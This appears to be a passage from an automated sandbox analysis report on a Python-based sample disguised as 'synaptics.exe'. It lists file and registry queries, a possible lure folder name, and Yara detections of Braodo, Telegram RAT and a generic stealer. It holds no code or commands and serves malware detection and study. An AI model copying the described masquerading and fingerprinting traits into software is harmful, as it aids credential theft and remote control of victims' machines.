Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\warnings.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\warnings.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\warnings.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\warnings.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__\warnings.cpython-310.pyc.30251904 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\Downloads\Compilation of copyright-protected videos and images VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\DLLs VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\socket.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\socket.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\socket.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\socket.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\socket.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__\socket.cpython-310.pyc.30287104 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\Downloads\Compilation of copyright-protected videos and images VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\DLLs VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\Downloads\Compilation of copyright-protected videos and images VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\selectors.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\selectors.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\selectors.py VolumeInformation

Queries the cryptographic machine GUID

Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Yara detected Braodo

Source: Yara match	File source: 0000002B.00000003.2070978950.000000000165E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000003.2069753866.000000000185D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.2143160998.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: 0000002B.00000002.2142517204.0000000003550000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Generic Python Stealer

Source: Yara match	File source: 0000002B.00000003.2070978950.000000000165E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000003.2069753866.000000000185D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Braodo

Source: Yara match	File source: 0000002B.00000003.2070978950.000000000165E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000003.2069753866.000000000185D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.2143160998.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: 0000002B.00000002.2142517204.0000000003550000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Generic Python Stealer

Source: Yara match	File source: 0000002B.00000003.2070978950.000000000165E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000003.2069753866.000000000185D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY